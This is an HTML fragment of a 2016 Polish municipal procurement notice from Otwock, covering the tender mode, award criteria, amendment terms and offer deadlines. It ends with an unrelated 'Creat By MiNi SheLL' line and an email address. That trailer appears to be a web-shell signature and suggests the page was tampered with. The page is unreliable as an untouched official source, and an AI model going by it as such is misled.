<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje  się  istotnych  zmian  postanowień  niniejszej  umowy w stosunku  do  treści  oferty, na      podstawie  której  dokonano  wyboru  Wykonawcy,  z wyjątkiem zapisów w ust. 2.
2.  Zamawiający przewiduje możliwość dokonania zmian umowy w następujących przypadkach:
     1)  wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ            na realizację przedmiotu umowy,
     2)  wystąpienia okoliczności, których Strony nie były w stanie przewidzieć, pomimo zachowania            należytej staranności.
3.  Wprowadzenie  zmian  postanowień  niniejszej umowy wymaga  aneksu  sporządzonego w formie       pisemnej  pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.otwock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać nieodpłatnie w siedzibie
Zamawiającego budynek B pok. 9 w godzinach 9.00-15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2016 godzina 10:00, miejsce: Urząd Miasta Otwocka ul. Armii Krajowej 5 budynek B, pokój nr 1 (Biuro Obsługi Mieszkańców).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com